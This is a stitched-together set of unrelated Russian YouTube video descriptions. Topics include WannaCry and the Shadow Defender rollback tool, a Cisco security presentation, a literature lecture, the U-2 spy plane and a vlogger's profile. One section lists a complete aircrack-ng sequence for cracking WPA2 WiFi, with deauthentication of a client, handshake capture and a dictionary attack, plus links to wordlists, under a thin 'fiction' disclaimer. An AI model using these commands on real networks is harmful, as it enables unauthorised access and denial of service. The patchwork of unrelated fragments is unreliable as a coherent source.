это молодой канал и требует много усилий для развития, если вам понравилось данное видео, буду рад вашим лайкам и подписке
на канал!
материальная поддержка канала так же приветствуется:
Донейт — www.donationalerts.ru/r/poisoncorpse
ЯMoney — money.yandex.ru/to/410012070304208
Webmoney USD — Z390909593537
Webmoney RUB — R271840957595
В этом видео пойдет речь:
◘ Вирус WannaCry
◘ Тестируем вирус WannaCry
◘ Защита операционной системы Windows
◘ Откат операционной системы
◘ Восстановление удаленных данных
◘ Защита компьютера от детей
По любому у каждого владельца ПК бывали такие ситуации когда приходят гости и ваш компьютер становится жертвой нападения школьников. Многие владельцы компьютер не в большом восторге от того, что их машину кто-то будет лапать своими грязными руками. Тут дело не потому что «жалко», а потому что это часть человека. Эта система адаптирована под тебя, это кресло, эта мышка, эта клавиатура и т.д. — это всё твое убежище, и незваных гостей оно не приветствует.
Но, увы, не всегда мы в состоянии распоряжаться этим будучи подростками. Если к твоей маме придёт подружка со своим ребенком то они буду готовы на всё, лишь бы он им не мешал. И это «готовы на всё» будет являться нянечка в твоей лице. Это существо однозначно захочется притронуться к твоему оборудованию и как минимум заставить тебя играть во что-нибудь, либо будет терроризировать тебя пока ты ему не дашь поиграть. А если ты не дашь мамка тебя явно накажет поэтому хочешь ты или нет, но дать свой компьютер во владение мелкой личинки придётся.
И кто знает, что может произойти? Быть может ребенок перезапишет все твои сохранения, либо захочет просмотреть твои фотографии, накачает кучу вирусов, сделает браузер «Амиго» по умолчанию, а поисковиком станет mail.ru, или же захочет ради интереса снести тебе операционную систему, удалив папку Windows.
Я недавно нашел одно решение, которое сможет обезопасить систему от нападения мелких. Метод работает лишь с операционной системой, но не с самим компьютером (он по прежнему будет его трогать). Программа Shadow Defender — утилита для Microsoft Windows, которая позволяет защитить операционную систему, приложения и конфиденциальную информацию от изменений, а также сохранить их работоспособность.
Пусть хоть папку windows удаляет, или устанавливает любые браузеры, перезаписывает сохранения да хоть что! После перезагрузки все данные будут восстановлены в прежнем состоянии, достаточно указать жесткий диск, доступ к изменениям которому вы хотите ограничить, и выбрать нужный вам вариант:
1) Либо, чтобы изменения вступили в силу сразу же, и откат произошел после перезагрузки.
2) Либо, чтобы изменения вступили в силу после следующей загрузки компьютера.
Таким вот простым образом вы с лёгкостью можете обезопасить свои данные на всех жестких дисках. Правда компьютер (именно физически) всё еще будет под угрозой быть заляпанным соплями, хлебными крошками, шоколадом или пролитым соком.
Прошло то время, когда вся система информационной безопасности на предприятии ограничивалась антивирусами на рабочих станциях и межсетевыми экранами на периметре. Сегодня, по оценкам экспертов, свыше 50% предприятий использует от 6 до 50 различных средств защиты. Как разобраться в том, что действительно важно, а что является обычным маркетинговым шлаком? Как понять, какие технологии нужно внедрять уже сейчас, а какие можно отложить до лучших времен? Обзору новых технологий (EDR,UEBA, NTA, NFT, CASB и др.) и посвящена данная презентация, в которой рассматриваются следующие вопросы:
— Как строилась система защиты еще совсем недавно?
— Почему прежняя парадигма системы защиты уже не работает?
— Как строить систему защиту с учетом текущих и среднесрочных тенденций?
— Что такое Use Case и какие они бывают?
— Какие технологии ИБ будут востребованы в ближайшее время и что они умеют делать (EDR, MDR, CASB, UEBA, NTA, NFT/EFT, TI, TVM, SIR, SIEM, Deception, Advanced Analytics, EPP, NGIPS, Browser Isolation, Microsegmentation, SDP, Container Security, Attack Simulation, SOAR и др.)?
Подписаться на канал Cisco: bit.ly/L1TDRt
Программа «Открытый урок с Дмитрием Быковым» — смотрите только на RTVi.
«Евгений Онегин», как неоконченный роман.
Все лекции Дмитрия Быкова Вы можете найти на сайте rtvi.com и на нашем YouTube-канале.
Lockheed U-2 «Dragon Lady» — реактивный высотный разведывательный самолет, разработанный компанией Lockheed в 1950-хх.
Самолет был создан для выполнения наблюдательных полетов в любом регионе мира даже при условии активного противодействия ПВО. Основой его концепции является высотность полетов — более 70000 футов или 21 км, недостижимая для самолетов и артиллерии того времени. Самолет активно эксплуатировался силами ЦРУ и ВВС США до 1970-хх, а далее, ВВС США.
За весь приод экслпуатации U-2 принимал участие в, практически, всех военных операциях ВС США и спецвойск, а так же, проводил разведывательные миссии во всех регионах, включая СССР и КНР. В условиях гонки вооружений, силы ПВО, периодически, «догоняли» высотный разведчик и им удавалось его сбить. Наиболее известным таким случаем было сбитие U-2 с пилотом Фрэнсисом Гэри Пауэрсом в 1960 году. Однако, не смотря на все сложности и скандалы, U-2 продолжают службу до сих пор.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…
Как меня зовут?
— МАДИНА МАЛИКОВА
Сколько мне лет?
— 21 ГОД
Откуда я?
— Я С КАЗАХСТАНА, ГОРОД АЛМАТЫ
Кто я по национальности?
— КАЗАШКА
Где я учусь?
— ZHEJIANG UNIVERSITY INTERNATIONAL CAMPUS В ГОРОДЕ ХАЙНИНЬ, КИТАЙ
На что я снимаю статичные видое?
— CANON 700D
На что я снимаю влоги?
— DJI Osmo Pocket
В какой программе я монтирую?
— FINAL CUT PRO X